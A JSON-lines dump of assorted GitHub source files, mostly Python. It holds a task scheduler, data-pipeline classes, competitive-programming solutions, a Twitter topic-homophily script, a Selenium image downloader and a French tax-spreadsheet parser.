= inventory.get_virtualmachine(self.si_content, moid=vm_id)\n\n task = vm.Destroy_Task()\n success = self._wait_for_task(task)\n\n # verify status is running.\n return {\"status\": success}\n","repo_name":"cibingeorge/st2contrib","sub_path":"packs/vsphere/actions/vm_destroy.py","file_name":"vm_destroy.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"74897237607","text":"# need fix\n# https://www.acmicpc.net/problem/1920\n# 런타임에러\n\nnum1=0\nnum2=0\nnum1_arr=[]\nnum2_arr=[]\nsol=[]\nzero = 0\n\nnum1=int(input())\nfor n1 in range(num1):\n a = input()\n num1_arr.append(a)\n\nnum2 = int(input())\nfor n2 in range(num2):\n b=input()\n num2_arr.append(b)\n sol.append(zero)\n\nn1=0;n2=0\n\nfor n2 in range(num2):\n for n1 in range(num1):\n if(num2_arr[n2]==num1_arr[n1]):\n sol[n2]=1\nfor i in range(len(sol)):\n print(sol[i])","repo_name":"chjwon/BOJ_answer_py","sub_path":"need_fix/1920.py","file_name":"1920.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75103125287","text":"from __future__ import annotations\n\nfrom collections import 
OrderedDict\nfrom typing import TYPE_CHECKING, Any, Dict, List\n\nfrom ml_metadata import proto\n\nfrom coalescenceml.enums import ExecutionStatus\nfrom coalescenceml.logger import get_logger\n\n\nif TYPE_CHECKING:\n from coalescenceml.metadata_store import BaseMetadataStore\n from coalescenceml.post_execution.step import StepView\n\nlogger = get_logger(__name__)\n\n\nclass PipelineRunView:\n \"\"\"Post-execution pipeline run class which can be used to query\n steps and artifact information associated with a pipeline execution.\n \"\"\"\n\n def __init__(\n self,\n id_: int,\n name: str,\n executions: List[proto.Execution],\n metadata_store: BaseMetadataStore,\n ):\n \"\"\"Initializes a post-execution pipeline run object.\n In most cases `PipelineRunView` objects should not be created manually\n but retrieved from a `PipelineView` object instead.\n Args:\n id_: The context id of this pipeline run.\n name: The name of this pipeline run.\n executions: All executions associated with this pipeline run.\n metadata_store: The metadata store which should be used to fetch\n additional information related to this pipeline run.\n \"\"\"\n self._id = id_\n self._name = name\n self._metadata_store = metadata_store\n\n self._executions = executions\n self._steps: Dict[str, StepView] = OrderedDict()\n\n @property\n def name(self) -> str:\n \"\"\"Returns the name of the pipeline run.\"\"\"\n return self._name\n\n @property\n def status(self) -> ExecutionStatus:\n \"\"\"Returns the current status of the pipeline run.\"\"\"\n # Use a list, not a generator: any() below would exhaust a generator,\n # making the all() check vacuously true for still-running pipelines.\n step_statuses = [step.status for step in self.steps]\n\n if any(status == ExecutionStatus.FAILED for status in step_statuses):\n return ExecutionStatus.FAILED\n elif all(\n status == ExecutionStatus.COMPLETED\n or status == ExecutionStatus.CACHED\n for status in step_statuses\n ):\n return ExecutionStatus.COMPLETED\n else:\n return ExecutionStatus.RUNNING\n\n @property\n def steps(self) -> List[StepView]:\n \"\"\"Returns all steps that were executed as part of this pipeline run.\"\"\"\n self._ensure_steps_fetched()\n return list(self._steps.values())\n\n def get_step_names(self) -> List[str]:\n \"\"\"Returns a list of all step names.\"\"\"\n self._ensure_steps_fetched()\n return list(self._steps.keys())\n\n def get_step(self, name: str) -> StepView:\n \"\"\"Returns a step for the given name.\n Args:\n name: The name of the step to return.\n Raises:\n KeyError: If there is no step with the given name.\n \"\"\"\n self._ensure_steps_fetched()\n try:\n return self._steps[name]\n except KeyError:\n raise KeyError(\n f\"No step found for name `{name}`. 
This pipeline \"\n f\"run only has steps with the following \"\n f\"names: `{self.get_step_names()}`\"\n )\n\n def _ensure_steps_fetched(self) -> None:\n \"\"\"Fetches all steps for this pipeline run from the metadata store.\"\"\"\n if self._steps:\n # we already fetched the steps, no need to do anything\n return\n\n self._steps = self._metadata_store.get_pipeline_run_steps(self)\n\n def __repr__(self) -> str:\n \"\"\"Returns a string representation of this pipeline run.\"\"\"\n return (\n f\"{self.__class__.__qualname__}(id={self._id}, \"\n f\"name='{self._name}')\"\n )\n\n def __eq__(self, other: Any) -> bool:\n \"\"\"Returns whether the other object is referring to the same\n pipeline run.\"\"\"\n if isinstance(other, PipelineRunView):\n return (\n self._id == other._id\n and self._metadata_store.uuid == other._metadata_store.uuid\n )\n return False\n","repo_name":"bayoumi17m/CoalescenceML","sub_path":"src/coalescenceml/post_execution/pipeline_run.py","file_name":"pipeline_run.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"13897633462","text":"\n#import sys\nfrom pptree import *\t\ninp = input().split()\nn=int(inp[0])\nk=int(inp[1])\nlll=input().split()\nls=[int(i) for i in lll]\nfstore={}\nbstore={}\n#sys.setrecursionlimit(3*n)\nr1=Node('f('+str(k-1)+')')\nr2=Node('f('+str(n-1)+')')\ndef forward(i,root):\n\tres=0\n\tif i==n-1:\n\t\troot.name=root.name+'='+str(ls[n-1])\n\t\treturn ls[n-1]\n\telif i==n-2:\n\t\tchild=Node('f('+str(n-1)+')'+str(ls[n-1])+':',root)\n\t\tres=forward(n-1,child)\n\t\troot.name=root.name+'='+str(ls[n-2]+res)\n\t\treturn ls[n-2]+res\n\telif i in fstore:\n\t\troot.name=root.name+'='+str(res)\n\t\tres=fstore[i]\n\telse:\n\t\tchild1=Node('f('+str(i+1)+')'+str(ls[i+1])+':',root)\n\t\tchild2=Node('f('+str(i+2)+')'+str(ls[i+1])+':',root)\n\t\tfstore[i]=max(ls[i]+forward(i+1,child1),ls[i]+forward(i+2,child2))\n\t\tres=fstore[i]\n\t\troot.name=root.name+'='+str(res)\n\treturn res\ndef back(j,root):\n\tif j==0:\n\t\troot.name=root.name+'='+str(ls[0])\n\t\treturn ls[0]\n\telif j==1:\n\t\tchild=Node('f('+str(j-1)+'):',root)\n\t\tres=back(j-1,child)\n\t\troot.name=root.name+'='+str(ls[1]+res)\n\t\treturn ls[1]+res\n\telif j in bstore:\n\t\troot.name=root.name+'='+str(bstore[j])\n\t\treturn bstore[j]\n\telse:\n\t\tchild1=Node('f('+str(j-1)+')'+str(ls[j-1])+':',root)\n\t\tchild2=Node('f('+str(j-2)+')'+str(ls[j-2])+':',root)\n\t\tbstore[j]= max(ls[j]+back(j-1,child1),ls[j]+back(j-2,child2))\n\t\troot.name=root.name+'='+str(bstore[j])\n\t\treturn bstore[j]\n\na=forward(k-1,r1)-ls[k-1]\nb=back(n-1,r2)-ls[n-1]\nprint('a:',a)\nprint('b:',b)\nprint_tree(r1)\nprint_tree(r2)","repo_name":"Shubhamsharda/Competetive-Programming","sub_path":"scscsc.py","file_name":"scscsc.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24894183949","text":"import datetime\nimport fcntl\nimport logging\nimport multiprocessing\nimport os\nimport sched\nimport time\n\nfrom .decorators import cached_property\n\n\nONE_DAY = datetime.timedelta(days=1)\n\n\nclass DailyTasksProcess(multiprocessing.Process):\n\n \"\"\"A simple daily task runner.\n\n .. note:: If your needs are more complex than running more than a\n handful of daily tasks, you probably shouldn't use this.\n\n This is an alternative to cron and Celery. 
The former is hard to get\n set up on ARC VMs; the latter is overkill when you just need to run\n a task or two once a day (and adds more points of failure).\n\n Now, it can certainly be argued that this adds complexity and is\n non-standard. On the other hand, what we've seen in practice are\n several different kinds of workarounds (AKA hacks) for the \"run a\n couple of daily tasks without massive pain\" problem. This at least\n provides *one* recommended way of running daily tasks.\n\n This is used by adding the following to the *bottom* of a project's\n wsgi.py::\n\n if not settings.DEBUG:\n from arcutils.tasks import DailyTasksProcess\n daily_tasks = DailyTasksProcess(home=root)\n # Rebuild the search index at 3:01am every day\n daily_tasks.add_task(call_command, 3, 1, ('rebuild_index',), {'interactive': False})\n daily_tasks.start()\n\n .. note:: :func:`django.core.wsgi.get_wsgi_application` *should* be\n called before adding tasks to ensure the environment is\n fully configured before any tasks are run.\n\n .. note:: In production, multiple mod_wsgi processes may be started,\n and each of them will execute the code as shown above, but\n only *one* of those mod_wsgi process will initialize a\n :class:`DailyTasksProcess` to run the specified tasks.\n\n \"\"\"\n\n def __init__(self, *args, home=None, lock_file_path=None, daemon=True, **kwargs):\n super().__init__(*args, daemon=daemon, **kwargs)\n home = home or os.getcwd()\n\n if lock_file_path is None:\n lock_file_name = '.{cls.__module__}.{cls.__qualname__}.lock'.format(cls=self.__class__)\n lock_file_path = os.path.join(home, lock_file_name)\n\n self.home = home\n self.lock_file_path = lock_file_path\n self.lock_file = open(self.lock_file_path, 'w')\n\n try:\n fcntl.flock(self.lock_file, fcntl.LOCK_EX | fcntl.LOCK_NB)\n except BlockingIOError:\n # Already locked; some other process is running daily tasks.\n self.add_task = self._noop\n self.start = self._noop\n self.lock_file.close()\n else:\n self.scheduler = sched.scheduler(time.time)\n\n @cached_property\n def log(self, *args, **kwargs):\n return logging.getLogger(__name__)\n\n def add_task(self, task, hour, minute=0, args=(), kwargs=None, name=None):\n \"\"\"Add a task to be run daily at the given hour and minute.\n\n ``hour`` must be an int between 0 and 23 (inclusive).\n\n ``minute`` must be an int between 0 and 59 (inclusive).\n\n ``task`` will be called as ``task(*args, **kwargs)``.\n\n ``name`` is a display name for the task; it's shown in log\n messages. 
If a ``name`` isn't passed, this will default to\n ``task.__name__``.\n\n \"\"\"\n name = name or task.__name__\n\n log = self.log\n log.info('Adding daily task %s at %d:%d', name, hour, minute)\n\n assert isinstance(hour, int), 'hour must be an int'\n assert 0 <= hour < 24, 'hour must be in [0, 23]'\n assert isinstance(minute, int), 'minute must be an int'\n assert 0 <= minute < 60, 'minute must be in [0, 59]'\n\n now = datetime.datetime.now()\n date_part = now.date()\n time_part = datetime.time(hour, minute, 0, 0)\n scheduled_time = datetime.datetime.combine(date_part, time_part)\n\n if scheduled_time <= now:\n scheduled_time += ONE_DAY\n\n log.info('First run of %s will be at %s', name, scheduled_time)\n\n kwargs = {} if kwargs is None else kwargs\n\n def action():\n nonlocal scheduled_time\n log.info('Running task %s with %s and %s...', name, args, kwargs)\n task(*args, **kwargs)\n scheduled_time += ONE_DAY\n log.info('Rescheduling %s for %s', name, scheduled_time)\n self.scheduler.enterabs(scheduled_time.timestamp(), None, action)\n\n self.scheduler.enterabs(scheduled_time.timestamp(), None, action)\n\n def run(self):\n self.lock_file.write(str(self.pid))\n self.lock_file.write('\\n')\n self.lock_file.flush()\n try:\n if self.scheduler.empty():\n raise RuntimeError(\n 'No tasks have been added; one or more tasks must be added via add_task() '\n 'before start() is called')\n self.scheduler.run()\n finally:\n fcntl.flock(self.lock_file, fcntl.LOCK_UN)\n self.lock_file.close()\n os.remove(self.lock_file_path)\n\n def _noop(self, *args, **kwargs):\n pass\n","repo_name":"PSU-OIT-ARC/django-arcutils","sub_path":"arcutils/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":5159,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
{"seq_id":"24735971637","text":"from itertools import izip\nimport collections\nfrom sets import Set\nimport sys\nfrom math import log\n\nNUM_TWEETS_PER_USER = sys.argv[1]\nNUM_TOPICS_PER_USER = sys.argv[2]\n\nprint(NUM_TWEETS_PER_USER)\nprint(NUM_TOPICS_PER_USER)\n\n\nnum_topics = 3\n\nf_users = open('user_id_100.txt', 'r')\nf_topics = open('ldaoutput_500.txt', 'r')\nf_neighbors = open('new_sample_edges.txt', 'r')\n\nuser_list = []\nuser_topic_dict = {} #top 3 topics\nuser_topic_dict_all = {}\nuser_neighbors = {}\n\nfor line in f_users:\n\tuser_list.append(line.rstrip())\n\nf_users.close()\n\nline_num = 0\nfor line in f_topics:\n\tfloat_list = [float(x) for x in line.split()]\n\tif(len(float_list) != 10):\n\t\tprint(\"Wrong number of topics\")\n\t\tsys.exit(0)\n\tuser_topic_dict_all[user_list[line_num]] = float_list\n\tsorted_list = sorted(float_list)[-num_topics:]\n\tx, y, z = sorted_list\n\tuser_topic_dict[user_list[line_num]] = [float_list.index(x), float_list.index(y), float_list.index(z)]\n\tline_num += 1\n\nf_topics.close()\n\nfor line in f_neighbors:\n\tu, v = line.split()\n\t# Wrap ids in a list: Set(v) would build a set of the id string's characters.\n\tif u not in user_neighbors:\n\t\tuser_neighbors[u] = Set([v])\n\telse:\n\t\tuser_neighbors[u].add(v)\n\tif v not in user_neighbors:\n\t\tuser_neighbors[v] = Set([u])\n\telse:\n\t\tuser_neighbors[v].add(u)\n\nf_neighbors.close()\n\ndef isHomophilous(x, y, choice):\n\tif choice == 0 :\n\t\tif(len(Set(x).intersection(Set(y))) > 0):\n\t\t\treturn 1\n\t\telse:\n\t\t\treturn 0\n\telif choice == 1:\n\t\treturn len(Set(x).intersection(Set(y)))/float(num_topics)\n\ndef originalMeasures():\n\tf_homophily_binary = open(\"homophily_binary_\" + str(NUM_TWEETS_PER_USER) + \"_\" + str(NUM_TOPICS_PER_USER) + \".txt\", 'w')\n\tf_homophily_ratios 
= open(\"homophily_ratios_\" + str(NUM_TWEETS_PER_USER) + \"_\" + str(NUM_TOPICS_PER_USER) + \".txt\", 'w')\n\tfor user, neighbors in user_neighbors.iteritems():\n\t\ttotal_neighbors = float(len(neighbors))\n\t\ttry:\n\t\t\tuser_topics = user_topic_dict[user] #store the topics of current user\n\t\texcept KeyError:\n\t\t\tcontinue\n\t\tnum_homopholous_binary = 0.0\n\t\tnum_homopholous_ratio = 0.0\n\t\tfor neighbor in neighbors:\n\t\t\ttry:\n\t\t\t\tneighbors_topics = user_topic_dict[neighbor]\n\t\t\texcept KeyError:\n\t\t\t\tcontinue\n\t\t\tnum_homopholous_binary += isHomophilous(user_topics, neighbors_topics, 0)\n\t\t\tnum_homopholous_ratio += isHomophilous(user_topics, neighbors_topics, 1)\n\n\t\tf_homophily_binary.write(str(num_homopholous_binary/total_neighbors) + \"\\n\")\n\t\tf_homophily_ratios.write(str(num_homopholous_ratio/total_neighbors) + \"\\n\")\n\n\tf_homophily_binary.close()\n\tf_homophily_ratios.close()\n\ndef relativeEntropyMeasures():\n\tf_kullback = open(\"kullback_leibler_output_\" + str(NUM_TWEETS_PER_USER) + \"_\" + str(NUM_TOPICS_PER_USER) + \".txt\", 'w')\n\tfor user, neighbors in user_neighbors.iteritems():\n\t\ttotal_neighbors = float(len(neighbors))\n\t\ttry:\n\t\t\tuser_topics = user_topic_dict_all[user] #store the topics of current user\n\t\texcept KeyError:\n\t\t\tcontinue\n\t\tkullback_leibler_sum = 0.0\n\t\tfor neighbor in neighbors:\n\t\t\ttry:\n\t\t\t\tneighbors_topics = user_topic_dict_all[neighbor]\n\t\t\texcept KeyError:\n\t\t\t\tcontinue\t\n\t\t\tkullback_leibler_sum += kullback_leibler(user_topics, neighbors_topics)\n\n\t\tf_kullback.write(str(kullback_leibler_sum/total_neighbors) + \"\\n\")\n\n\tf_kullback.close()\n\ndef kullback_leibler(u, v):\n\trel_ent = 0.0\n\tfor x in range(len(u)):\n\t\trel_ent+=(u[x] * log(u[x]/v[x],2))\n\treturn rel_ent\n\n\noriginalMeasures()\nrelativeEntropyMeasures()\n\n","repo_name":"mikrasov/TwitterTopicModel","sub_path":"Source Code/compare_users.py","file_name":"compare_users.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71208971367","text":"from django import forms\nfrom .models import Task\nclass TaskForm(forms.ModelForm):\n title = forms.CharField(label=\"Title\",max_length=50)\n details = forms.CharField(label=\"Description\",widget=forms.Textarea)\n date_due = forms.DateTimeField(label=\"Due Date\",required=False)\n priority = forms.IntegerField(label=\"Priority\")\n class Meta:\n model=Task\n fields = ['title','details','date_due','priority']","repo_name":"jacobhandy3/mysite","sub_path":"mysite/todo/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2228916555","text":"#Fibonacci com memorização de resultado\r\nmemoria ={0:0,1:1}\r\ndef fibonacci2(x):\r\n if x in memoria:\r\n return memoria[x]\r\n valor = fibonacci2(x-1) + fibonacci2(x-2)\r\n memoria[x]=valor\r\n return valor\r\n\r\nnumero = int(input('Informe um valor:'))\r\nprint(fibonacci2(numero))","repo_name":"nickellen/Algoritmos","sub_path":"lista 8/MES-Alg-08-Ex-04.py","file_name":"MES-Alg-08-Ex-04.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24342031965","text":"import os\nfrom collections import defaultdict\n\nfrom tracker.common.dcp_agents.analysis_agent import AnalysisAgent\nfrom 
tracker.common.dynamo_agents.dynamo_agent import DynamoAgent\nfrom tracker.common.dynamo_agents.ingest_dynamo_agent import IngestDynamoAgent\n\n# List of strings of species + method to be compared against populated bundle type counter\nMETHODS_SUPPORTED_FOR_WORKFLOWS = [\n \"10X 3' v2 sequencing homo sapiens\",\n \"10X 3' v2 sequencing paired-end homo sapiens\",\n \"10X v2 sequencing homo sapiens\",\n \"10X v2 sequencing paired-end homo sapiens\",\n \"10X v2 sequencing mus musculus\",\n \"10X v2 sequencing paired-end mus musculus\",\n \"10X 3' v2 sequencing mus musculus\",\n \"10X 3' v2 sequencing paired-end mus musculus\",\n \"Smart-seq2 paired-end homo sapiens\",\n \"Smart-seq2 paired-end mus musculus\"\n]\n\n\nclass AnalysisDynamoAgent(DynamoAgent):\n\n def __init__(self):\n super().__init__()\n deployment_stage = os.environ[\"DEPLOYMENT_STAGE\"]\n self.dynamo_table_name = f\"dcp-data-dashboard-analysis-info-{deployment_stage}\"\n self.table_display_name = \"analysis-info\"\n self.analysis_agent = AnalysisAgent()\n self.ingest_dynamo_agent = IngestDynamoAgent()\n\n def create_dynamo_payload(self, envelope, latest_primary_bundles, azul_project_info):\n project_uuid = envelope.project().uuid\n print(f\"creating analysis info payload for {project_uuid}\")\n workflows = self.analysis_agent.get_workflows_for_project_uuid(project_uuid)\n wfs_count_by_status, wfs_count_by_version = self._aggregrate_workflow_stats(workflows)\n payload = {}\n payload['project_uuid'] = project_uuid\n for status, wf_count in wfs_count_by_status.items():\n payload[status.lower() + '_workflows'] = wf_count\n for version, wf_count in wfs_count_by_version.items():\n payload[version] = wf_count\n payload['total_workflows'] = len(workflows)\n workflows_expected = self._workflow_count_expected_for_project(azul_project_info)\n payload['expected_workflows'] = workflows_expected\n payload['analysis_state'] = self._determine_state_of_workflows(workflows,\n latest_primary_bundles,\n envelope,\n project_uuid,\n workflows_expected)\n payload['failures_present'] = False\n if payload.get('failed_workflows'):\n payload['failures_present'] = True\n return payload\n\n def _determine_state_of_workflows(self, workflows, latest_primary_bundles, envelope, project_uuid, workflows_expected):\n latest_input_bundle_versions_with_successful_workflows = set()\n input_bundle_uuids_with_successful_workflows = set()\n for workflow in workflows:\n input_bundle_uuid = workflow['labels']['bundle-uuid']\n input_bundle_version = workflow['labels']['bundle-version']\n workflow_status = workflow['status']\n latest_bundle_version = latest_primary_bundles.get(input_bundle_uuid, {}).get('version', 'N/A')\n if workflow_status == 'Succeeded':\n input_bundle_uuids_with_successful_workflows.add(input_bundle_uuid)\n if latest_bundle_version in input_bundle_version:\n latest_input_bundle_versions_with_successful_workflows.add(input_bundle_uuid)\n\n # This is a patch for where failing workflows still produced bundles or incorrect workflows ran\n if (project_uuid == 'f83165c5-e2ea-4d15-a5cf-33f3550bffde' and\n workflows_expected == 7628 and\n len(latest_input_bundle_versions_with_successful_workflows)) == 7611:\n return 'COMPLETE'\n elif (project_uuid == 'f8aa201c-4ff1-45a4-890e-840d63459ca2' and\n workflows_expected == 10 and\n len(latest_input_bundle_versions_with_successful_workflows) == 17):\n return 'COMPLETE'\n\n if workflows_expected == 0:\n return 'NOT_EXPECTED'\n elif len(input_bundle_uuids_with_successful_workflows) < workflows_expected:\n return 
'INCOMPLETE'\n else:\n return 'COMPLETE'\n\n def _bundle_uuids_with_successful_workflows(self, project_uuid):\n workflows = self.analysis_agent.get_workflows_for_project_uuid(project_uuid)\n input_bundle_uuids_with_successful_workflows = set()\n for workflow in workflows:\n workflow_status = workflow['status']\n input_bundle_uuid = workflow['labels']['bundle-uuid']\n if workflow_status == 'Succeeded':\n input_bundle_uuids_with_successful_workflows.add(input_bundle_uuid)\n return input_bundle_uuids_with_successful_workflows\n\n def _workflow_count_expected_for_project(self, azul_info):\n project_bundle_type_counter = azul_info['primary_bundle_type_counter']\n workflows_expected = 0\n for method in METHODS_SUPPORTED_FOR_WORKFLOWS:\n if project_bundle_type_counter.get(method.lower()):\n workflows_expected += project_bundle_type_counter[method.lower()]\n return workflows_expected\n\n def _aggregrate_workflow_stats(self, workflows):\n workflow_count_by_status = defaultdict(lambda: 0)\n workflow_count_by_version = defaultdict(lambda: 0)\n for workflow in workflows:\n wf_status = workflow['status']\n wf_version = workflow['labels']['workflow-version']\n workflow_count_by_status[wf_status] = workflow_count_by_status[wf_status] + 1\n workflow_count_by_version[wf_version] = workflow_count_by_version[wf_version] + 1\n return workflow_count_by_status, workflow_count_by_version\n","repo_name":"HumanCellAtlas/data-monitoring-dashboard","sub_path":"tracker/common/dynamo_agents/analysis_dynamo_agent.py","file_name":"analysis_dynamo_agent.py","file_ext":"py","file_size_in_byte":5911,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"84921887","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\nimport os, shutil\n\nimport time\n\nfilepath = 'C:\\\\Users\\\\User\\\\ssafy_6\\\\medicine_img'\n\noptions = webdriver.ChromeOptions()\noptions.add_argument('headless')\n\noptions.add_experimental_option(\"prefs\", {\n \"download.default_directory\": \"C:\\\\Users\\\\User\\\\ssafy_6\\\\medicine_img\",\n \"download.prompt_for_download\": False,\n \"download.directory_upgrade\": True,\n \"safebrowsing.enabled\": True\n})\n\ndriver = webdriver.Chrome(chrome_options=options)\ndriver.get('https://nedrug.mfds.go.kr/pbp/cmn/itemImageDownload/147426403087300104')\ntime.sleep(1)\n\nfilename = max([filepath + '\\\\' + f for f in os.listdir(filepath)], key=os.path.getctime)\nshutil.move(os.path.join(filepath, filename), './img/200808876.jpg')\n\ndriver.close()","repo_name":"team-helloz/Lemonaid","sub_path":"data/크롤링/medicine/medicine_image.py","file_name":"medicine_image.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"72508979047","text":"#! 
/usr/bin/env python\n\nfrom setuptools import setup, find_packages\n\n# Extracts the __version__\nVERSION = [\n l for l in open('rbh_quota/__init__.py').readlines()\n if l.startswith('__version__ = ')\n][0].split(\"'\")[1]\n\nsetup(\n name='rbh-quota',\n version=VERSION,\n packages=find_packages(),\n description='rbh plugin to add QUOTA table in MySQL database',\n keywords='rbh robinhood quota database',\n author='Sami BOUCENNA',\n author_email='liquid.same@gmail.fr',\n entry_points={'console_scripts': ['rbh-quota = rbh_quota.rbhQuota:insert']},\n install_requires=['MySQL-python'],\n)\n","repo_name":"LiquidNalee/rbh-quota","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5144287343","text":"\"\"\"\nGiven n nodes labeled from 0 to n - 1 and a list of undirected edges(each edge is a pair of nodes),\nwrite a function to check whether these edges make up a valid tree.\n\nExample 1:\n Input: n = 5, edges = [[0,1],[0,2],[0,3],[1,4]]\n Output: true\n\"\"\"\n\n\ndef valid_tree(n, edges):\n if not n:\n return True\n adj = {i: [] for i in range(n)}\n for n1, n2 in edges:\n adj[n1].append(n2)\n adj[n2].append(n1)\n\n visited = set()\n\n def dfs(i, prev):\n if i in visited:\n return False\n visited.add(i)\n for j in adj[i]:\n if j == prev:\n continue\n if not dfs(j, i):\n return False\n return True\n\n return dfs(0, -1) and len(visited) == n\n\n\nprint(valid_tree(5, [[0, 1], [0, 2], [0, 3], [1, 4]]))\n","repo_name":"pushpa66/Learn-data-structures-and-algorithms-in-python","sub_path":"75/Q32 Graph Valid Tree_Leetcode 261.py","file_name":"Q32 Graph Valid Tree_Leetcode 261.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34901729079","text":"#Scores 91 - 100: Grade = \"Outstanding\"\n#Scores 81 - 90: Grade = \"Exceeds Expectations\"\n#Scores 71 - 80: Grade = \"Acceptable\"\n#Scores 70 or lower: Grade = \"Fail\"\n\nstudent_score={}\nstudent_grade={}\nnum_std=int(input(\"enter no. of students :\"))\nfor i in range (0,num_std):\n name=input(f\"enter name of student no. 
{i+1} : \")\n marks=int(input(\"enter marks of the student :\\n\"))\n student_score[name]=marks\n if(marks>90):\n grade=\"outstanding\"\n elif (marks>=81 and marks<=90):\n grade=\"exceeds expectations\"\n elif (marks>=71 and marks<=80):\n grade=\"acceptable\"\n else:\n grade=\"fail\"\n student_grade[name]=grade\nprint(student_score)\nprint(student_grade)","repo_name":"issarbhavya/100-days-of-python","sub_path":"day 1-10/day9/scores_to_grades(dict).py","file_name":"scores_to_grades(dict).py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"23897135558","text":"def sequence(T):\n n = len(T)\n counter = 1\n maxStart = 0\n minEnd = 10**10\n \n for i in range(n-1):\n if T[i] < T[i+1]:\n counter += 1\n else:\n if counter > 2:\n maxStart = max(maxStart, i-counter+1)\n minEnd = min(minEnd, T[i])\n \n counter = 1\n \n if counter > 2:\n maxStart = max(maxStart, i-counter+1)\n minEnd = min(minEnd, T[i])\n \n return minEnd < maxStart\n \nt = [2,15,17,13,17,19,23,2,6,4,8,3,5,7,14,3,2]\n\nprint(sequence(t))","repo_name":"mistrzegiptu/WDI","sub_path":"kolosy/B1_2022.py","file_name":"B1_2022.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"19951435421","text":"\n\n\nimport logging\nimport numpy\nimport os\nimport pandas\nimport pkg_resources\nimport re\n\n\nfrom ipp_macro_series_parser.config import Config\n\nconfig_parser = Config()\n\nxls_directory = config_parser.get('data', 'denombrements_fiscaux_xls')\nhdf_directory = config_parser.get('data', 'denombrements_fiscaux_hdf')\n\n\nlog = logging.getLogger(__name__)\n\n\ndef parse_ipp_denombrements():\n\n file_path = os.path.join(xls_directory, u'Agrégats IPP - Données fiscales.xls')\n\n def parse_bloc(name = None, sheetname = '2042-montant', skiprows = 0, parse_cols = None, slice_start = None,\n slice_end = None, prefix = ''):\n assert name is not None\n df = pandas.read_excel(\n file_path,\n na_values = '-',\n sheetname = sheetname,\n skiprows = skiprows,\n parse_cols = parse_cols).iloc[slice_start:slice_end]\n df.columns = ['year'] + (prefix + df.columns[1:].str.lower()).tolist()\n try:\n df = df.convert_objects(convert_numeric=True)\n df = df.astype(float)\n df.year = df.year.astype(int)\n except Exception as e:\n print(e)\n return name, df\n return name, df\n\n # Fiche principale\n\n # 1 - Traitements, salaire, prime pour l'emploi, pensions et rentes\n traitements_salaires = dict(\n name = 'traitements_salaires',\n sheetname = '2042-montant',\n skiprows = 4,\n parse_cols = 'A:AB',\n slice_start = 1,\n slice_end = 18,\n prefix = 'f1',\n )\n\n prime_emploi = dict(\n name = 'prime_emploi',\n sheetname = '2042-montant',\n skiprows = 25,\n parse_cols = 'A:K',\n slice_start = 1,\n slice_end = 17,\n prefix = 'f1',\n )\n\n pension_retraite = dict(\n name = 'pension_retraite',\n sheetname = '2042-montant',\n skiprows = 46,\n parse_cols = 'A:M',\n slice_start = 1,\n slice_end = 18,\n prefix = 'f1',\n )\n\n rentes_viageres_titre_onereux = dict(\n name = 'rentes_viageres_titre_onereux',\n sheetname = '2042-montant',\n skiprows = 68,\n parse_cols = 'A:E',\n slice_start = 1,\n slice_end = 17,\n prefix = 'f1',\n )\n\n # 2 - Revenus des valeurs et capitaux mobiliers\n\n prelevement_forfaitaire_liberatoire = dict(\n name = 'prelevement_forfaitaire_liberatoire',\n sheetname = '2042-montant',\n skiprows = 89,\n parse_cols = 'A:D',\n slice_start = 1,\n slice_end = 18,\n 
prefix = 'f2',\n )\n\n revenus_avec_abattement = dict(\n name = 'revenus_avec_abattement',\n sheetname = '2042-montant',\n skiprows = 111,\n parse_cols = 'A:E',\n slice_start = 1,\n slice_end = 18,\n prefix = 'f2',\n )\n\n revenus_sans_abattement = dict(\n name = 'revenus_sans_abattement',\n sheetname = '2042-montant',\n skiprows = 133,\n parse_cols = 'A:D',\n slice_start = 1,\n slice_end = 18,\n prefix = 'f2',\n )\n\n autres_revenus_financiers = dict(\n name = 'autres_revenus_financiers',\n sheetname = '2042-montant',\n skiprows = 154,\n parse_cols = 'A:I',\n slice_start = 1,\n slice_end = 18,\n prefix = 'f2',\n )\n\n # 3 - Plus values et gains taxables à 16% (18% à partir de 2008)\n\n plus_values = dict(\n name = 'plus_values',\n sheetname = '2042-montant',\n skiprows = 199,\n parse_cols = 'A:C',\n slice_start = 1,\n slice_end = 19,\n prefix = 'f3',\n )\n\n # 4 - Revenus fonciers\n # TODO: copier coller d'une note\n # Pour les dénombrements de 96 à 2001, on ne connait plus le détail des différents déficits mais seulement total\n # agrégé (case total def)\n # Comme les parts des différents déficits sur le déficit total est pratiquement constant dans le temps, on assume\n # donc que la répartition du déficit total entre les différents déficits est 